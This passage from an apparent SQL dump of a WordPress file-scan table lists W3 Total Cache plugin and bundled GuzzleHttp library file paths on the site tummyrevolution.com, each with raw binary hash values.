','wp-content/plugins/w3-total-cache/ini/apc.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/apc.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ⷛF\0^UQ','._Oj%N[osȮv-','',0,'?'),('ߒ\n{v]nM','wp-content/plugins/w3-total-cache/ini/config-db-sample.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/config-db-sample.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0hag\ZL','k4j}Fn( 8Dv4^Y','',0,'?'),('\\hin\\\"u\"','wp-content/plugins/w3-total-cache/ini/dbcluster-config-sample.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/dbcluster-config-sample.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0,}uf:','08Id$~_MIg0>JF^DR\"','',0,'?'),('̵̌$ٿ\'','wp-content/plugins/w3-total-cache/ini/eaccelerator.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/eaccelerator.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m,x_\rw R','1XH; =+e?~~CWSBp','',0,'?'),('!X8]#¼2Ƴ','wp-content/plugins/w3-total-cache/ini/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('K5EiNQ\'','wp-content/plugins/w3-total-cache/ini/memcache.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/memcache.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\\elb/c','jތM;m\ZvTXgP','',0,'?'),(' 8%.b_','wp-content/plugins/w3-total-cache/ini/nginx-network-sample-config.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/nginx-network-sample-config.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X&%vU:{d','%h\\ CdO*`\ngr \'','',0,'?'),('EPK-YpQet|','wp-content/plugins/w3-total-cache/ini/nginx-standalone-sample-config.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/nginx-standalone-sample-config.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dֹ#\0\no','*d*o[` v2a{\n!+4','',0,'?'),('ٔgF[z{/','wp-content/plugins/w3-total-cache/ini/opcache.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/opcache.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FX\r)7ۻ4','vZm@/_G2k\\\Zbh*','',0,'?'),('b sKHnq','wp-content/plugins/w3-total-cache/ini/php.append.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/php.append.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X[i:8',']ٌ(^ĥM 7\0~','',0,'?'),('3kE4ë','wp-content/plugins/w3-total-cache/ini/s3-sample-policy.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/s3-sample-policy.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԥ^ =bQ','-n E`W.(%>֑\0m','',0,'?'),('Ɩut\'','wp-content/plugins/w3-total-cache/ini/varnish-sample-config.vcl','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/varnish-sample-config.vcl',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F VG','-jjdç2)-ƈbѐ&/','',0,'?'),('0żd(','wp-content/plugins/w3-total-cache/ini/web.config','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/web.config',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0@/;۴r.:','Ef~Դm#<\Z]k :qbuJ~Y','',0,'?'),('^ʙB`Iҵ\0}','wp-content/plugins/w3-total-cache/ini/xcache.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/xcache.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';RsHQt','+{7K$n <=I\\hg','',0,'?'),(']/[liKD/x','wp-content/plugins/w3-total-cache/languages/w3-total-cache.pot','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/languages/w3-total-cache.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oEw=_f\'$','>hiqhF2=(?!cܰڪ','',0,'?'),('ʭ[P9lC','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OmCmd]B5Ug,','c8nkx[0G-+/|KWfzF/','',0,'?'),('5;D+)ܫ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/CookieJarInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/CookieJarInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' WbF*S','PS=2׮r)A &âk-uꮁ','',0,'?'),('d5h36','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/FileCookieJar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/FileCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JQ([X','v[Iy%mcoUcw+V{','',0,'?'),('XVxr','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/SessionCookieJar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/SessionCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>aP\"k}','.Ng=~P\\ ASMdJS9,6ė','',0,'?'),('LCC`2Hص-','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/SetCookie.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Cookie/SetCookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h<_#U׳z:','%\0aLe/\0C d^m\Z4','',0,'?'),(' d\\{̴ai\'k','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/BadResponseException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/BadResponseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']P lj} n','.dP8wC]]B`sS','',0,'?'),('?Dee\nOa.o-N','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ClientException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ClientException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JqQ1+ a','׃;Z)\"XX⼴n','',0,'?'),('9CPC*:,W','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ConnectException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L:T©xA|IV','bՕѾ6MwUYʲz','',0,'?'),('wpS@ޒ/Tv','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/GuzzleException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/GuzzleException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WQ.oC\'^','\\<;rN\"l>!Wʳ','',0,'?'),(')i2/\"6+','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/RequestException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/RequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P˯\rN7',')j\r<\0pۈkX+0@G','',0,'?'),('<\0w;','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/SeekException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/SeekException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2KcOa*Ўnt','#>ǒ\\V(M^#ER\n߫Iڸ','',0,'?'),('sVW\0$iho','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ServerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/ServerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6취c;wZc','NE| ndʶ=Ƅ4t9&ˮp','',0,'?'),('q\nmLfO7t','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/TooManyRedirectsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/TooManyRedirectsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RŇpw+J','V:k9h&v\Z\\g','',0,'?'),('5^r#[&\n-','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/TransferException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Exception/TransferException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g2 bdbU','?/+B:T<[km*sm0','',0,'?'),('H.*^G!u ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ƅ Ba:h%W','sA`% +< 1dWZ-','',0,'?'),('Wlеڕs','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlFactoryInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlFactoryInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܤ9yA^O','^.OFRlLv.HH:}','',0,'?'),('5>wH+ [','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlHandler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/CurlHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rzWm8+L',' Q','',0,'?'),('KD4K&\n>','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/Proxy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2pH3Hʘ','Fc*G_p0gԾ\"pD 5','',0,'?'),('b;)L^X','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/StreamHandler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Handler/StreamHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MȿJ(.8.|','E$r$nn>\"ޡPYd','',0,'?'),('\nw|gjEiU7','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/HandlerStack.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/HandlerStack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ю]86ޡm','T\n);NkDe2V¢x&B=','',0,'?'),('Cj7 6]','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/MessageFormatter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/MessageFormatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z)\\l','[@4c|Q\"8C;','',0,'?'),('uƛ#p 1Х.b.','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Middleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Middleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j˳)ifWb','@\",JT׺ Upϑkq6[','',0,'?'),('=`ysVah','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Pool.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Pool.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&$ŒA z','{xYA`6lux&!\'','',0,'?'),('\"Hko~q','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/PrepareBodyMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/PrepareBodyMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ddф‰','c%arj\r hK\"Ls','',0,'?'),('pZTyd@sp_','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/AggregateException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/AggregateException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3M O_MU.','RR ?1|}5f Yx?7HR+e','',0,'?'),('[!q:','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/CancellationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/CancellationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߳\\{C$','k:URycC-ZF[`\\P','',0,'?'),('!/q(t;xn','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/Coroutine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/Coroutine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q)08J','3*lȿR{n Iסpݑ@','',0,'?'),('ZyY \r R<[MV','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/EachPromise.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/EachPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g5֌my','b-0+ XvOF','',0,'?'),('kl\Z$N','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/FulfilledPromise.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/FulfilledPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0c\rMqL}','s ɍa]\'4>n,S Eu','',0,'?'),('ȲHXPo','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/Promise.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/Promise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^D~6Ue\n[',' +/X@J45!¼,IScM','',0,'?'),('/cY*I~Gpr','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/PromiseInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/PromiseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؛M™tVSƹN\"','k\rW$7m~.xvZ\'ǍhnV','',0,'?'),('bqi%\',ɥ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/PromisorInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/PromisorInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0tG7 =','`Rh^nt asF ;}Š','',0,'?'),('-dh[Ga','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/RejectedPromise.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/RejectedPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r:qR#|8Zۨz','􀌊1-EtE~8Zd#:','',0,'?'),(' +EHa6<','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/RejectionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/RejectionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!W?.\0䔽','JPӞN1+iRMB g','',0,'?'),('âv!\r\rӍ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/TaskQueue.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/TaskQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i: B9YG`',' o qKx\'c\Z1 2]b/\n','',0,'?'),('V \\#d!SC.','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/TaskQueueInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/TaskQueueInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r}$\Z:*ϹxDl','uSkIu9Vu&k\\CsqC','',0,'?'),('U% t%3f','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/4ԲHW|kjE','kH֖=8ޮ۔ $Ì','',0,'?'),('Cڅ\ZaeB','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/functions_include.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Promise/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˝3A![','@5!\"q?n^fpdx^n','',0,'?'),('$Ku¬\rwh','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/AppendStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/AppendStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','æis','IoPK\'~oAGEvm\n]`ie9Z):','',0,'?'),('$%u=1U','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/BufferStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/BufferStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʉ:9S1','Χ\'\'JBVᕖyVMd','',0,'?'),('[TcL,','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/CachingStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/CachingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dt J^h','dqNrq`.x<Ȕ\\v紐OQ','',0,'?'),('o]mL3^','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/DroppingStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/DroppingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\h^ج','!7UuW ䷉jj ~E','',0,'?'),('ֲ00vw|)=','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/FnStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/FnStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sw[^|H/c','fKv5Ic]5%D\'','',0,'?'),(']7\0Û{\rޱ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/InflateStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/InflateStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','; x8%$Ov','D2\nLrAv 8ЉSErg','',0,'?'),('AX7?oMw','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/LazyOpenStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/LazyOpenStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Hͻ339:+','\ZJ:VUO.:5 J1','',0,'?'),('d453@_يM','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/LimitStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/LimitStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t#*Pǝ','}῎rA{IZ=TDZ','',0,'?'),('É_Z<𲣼.','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/MessageTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/MessageTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')&D ǥZ[','k?\0tu5` <[S㶪Hjs<','',0,'?'),('T N\r~g','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/MultipartStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/MultipartStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+mW uA&_JL',' w-5$憪jTc)ִ=','',0,'?'),('1vmMπa\n}','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/NoSeekStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/NoSeekStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qz\n - \nn7[',',.Ժo¦K_uM#4FDV','',0,'?'),('^N fX\\IQ(Ge','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/PumpStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/PumpStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UKl>_\nQ2',' Lm6z5߉:߈j҇V','',0,'?'),('FjhB','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`}qzV\")','JdLk魯P,_ѝل_^f&T','',0,'?'),('\'F\rFq=','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Response.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ا9Hlxt','ۣ40ᇃ*DE:M gP\0\02','',0,'?'),('/Eߛ#`8DƲ','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/ServerRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/ServerRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^h','',0,'?'),('ڼ Bpk=','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/StreamDecoratorTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/StreamDecoratorTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h}-?z','41F9=q`jiȰ \\bI*?','',0,'?'),('{E{Gt]q/!','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/StreamWrapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/StreamWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϊ\n$:B8x%','.BFMS)ldڳR \\j','',0,'?'),('T,XfN9[K','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/UploadedFile.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/UploadedFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k!%G8xW0%','.`v5s+2rM\\@','',0,'?'),('u4TKt\\Gb:\r','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Uri.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/Uri.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','458\"\\6z|','\0f\"%[6JjXWx+J:ե;','',0,'?'),('8!8R XlU|3','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Ȳ3Qd\n8','w6Qr96\Z=Ƌ3K23chl','',0,'?'),('q8\0ߡ)㷐!','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/functions_include.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/Psr7/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qtD$S<',' F樹O8`5ƚqi}Wbݫ','',0,'?'),('4)|WOM','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RedirectMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RedirectMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pXnO!c9 ','-O wb} p6Z}5v>֧','',0,'?'),('\\Zm^lR![99','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RequestOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RequestOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\"&a46i','R\nΕ*~avBw-om y','',0,'?'),('ij;M\\D1','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RetryMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/RetryMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"g\n\rT34H(','<=m_n71J_pMBMa\\','',0,'?'),('d\"bbzS','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/TransferStats.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/TransferStats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KQ8r\0','T> !L/4 IS/d*6xf\nq','',0,'?'),('lsbe{veXO','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/UriTemplate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/UriTemplate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qֳl)5c','1F.g諂C 5&>)M\rړ','',0,'?'),('X#chz ǀ|H','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(R_; o\r','~R68;tlyi&w[','',0,'?'),('(7[l6|lr','wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/functions_include.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/GuzzleHttp/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0ÈOxxR','3a>A~&KUw31vDƄ_Up$','',0,'?'),(' JMR[@V/\"','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/BlobRestProxy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/BlobRestProxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n9ݗ5̞FP\n','U;۝U ! 